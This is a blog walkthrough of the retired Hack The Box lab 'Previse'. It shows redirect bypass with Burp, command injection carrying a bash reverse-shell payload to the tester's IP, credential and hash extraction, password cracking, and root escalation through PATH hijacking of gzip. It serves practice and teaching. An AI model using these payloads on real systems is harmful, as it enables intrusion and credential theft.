Security Blog, Rants, Raves, Write-ups, and Code
Security Blog, Rants, Raves, Write-ups, and Code
Previse
| Name: | Previse 
|
|---|---|
| Release Date: | 07 Aug 2021 |
| Retire Date: | 08 Jan 2022 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
onurshin  00 days, 00 hours, 23 mins, 06 seconds |
 |
zime  00 days, 00 hours, 26 mins, 10 seconds |
| Creator: | m4lwhere  |
| Pentest Workshop PDF: | Previse.pdf |
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.104
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
We have ports SSH TCP 22 and HTTP TCP 80 that are green. Let's run Gobuster and navigate to http://10.10.11.104 while that runs.
┌──(kali㉿kali)-[~/Desktop/HTB/Previse]
└─$ gobuster dir -u http://10.10.11.104 -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "php" -s "200,204,301,302,307"
-t50 -o previse.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/01/23 14:16:45 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 2801] [--> login.php]
/download.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 277]
===============================================================
2022/01/23 14:34:44 Finished
===============================================================
Looking at nav.php, we find a navigation bar that allows us to create a new user. Trying to create the account through a browser keeps redirecting us, but if we intercept the request using Burp and NOT follow the redirect, we can access the accounts.php page that will allow us to create the account we need.
From that code, we know that we need to POST a username, password, confirm, and submit field. Using:
username=neocount&password=password&confirm=password&submit=
should do the trick to create a new user. Let's see if we can change the 302 response to a 200 response. Navigate directly to http://10.10.11.104/accounts.php and when Burp intercepts it, click the "hamburger" button, go to "Do Intercept", and select "Response to this request" and click Forward. When that comes up, change the 302 Found to 200 Found and click Forward. Now you can interact with the account creation page.
Now that we have an account created, let's log in and see what we can use. There is a site backup file under the Files tab. Downloading that we can look through and hopefully find a foothold. For example, in the log.php file, we see that it is using an exec() function. PHP exec() functions allow for system commands to be run, in this case, a log_process.py script, but can be hijacked for us to, hopefully, get a reverse shell foothold.
Under the Management Menu > Log Data, there is a method of getting log data that uses that function, which means we should be able to use it to make a reverse shell callback if we define the delim using:
delim=%3bbash+-c+'bash+-i+>%26+/dev/tcp/<YOUR TUN0 IP>/1337+0>%261'%3b
and start a netcat listener on your machine. The Deliminator field is a drop down, so we need to intercept it with Burp again.
The directory we are dropped in (/var/www/html) has a config.php file. Cat'ing it gives us mysql credentials. Quick find.
root:mySQL_p@ssw0rd!:)
Connecting to mysql, we check out the user tables in the databases.
mysql -u root -p'mySQL_p@ssw0rd!:)' -e 'show databases;'
mysql -u root -p'mySQL_p@ssw0rd!:)' previse -e 'show tables;'
mysql -u root -p'mySQL_p@ssw0rd!:)' previse -e 'select * from accounts;'
Looking into accounts.php again, we find the exact method of encryption.
$hash = crypt($password, '$1$🧂llol$');
$db = connectDB();
if ($db === false) {
die("ERROR: Could not connect. " . $db->connect_error);
}
$sql = "INSERT INTO accounts (username, password) VALUES ('{$username}','{$hash}')";
$result = $db->query($sql);
Now, we just need to enter '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' into a hash file and crack it using John with an md5crypt format.
echo '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' > hash && john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash
m4lwhere:ilovecody112235!
First, grab the user.txt flag and start privesc enumeration.
m4lwhere@previse:~$ cat user.txt
9618ea8ff392dadb2ed985a8a0b807cc
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$
Unfortunately, access_backup.sh is owned by root so we cannot modify it. However, we can read it and it uses gzip to create the backup. While we can't modify the script, we can create a new gzip and add it to the PATH using:
cd /tmp
export PATH=/tmp:$PATH
echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > gzip
chmod +x gzip
sudo /opt/scripts/access_backup.sh
./bash -p
bash-4.4# cat /root/root.txt
1a0eebd484c0b843def6a26ba65afda8
Odd box. Grab the flag and celebrate!
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.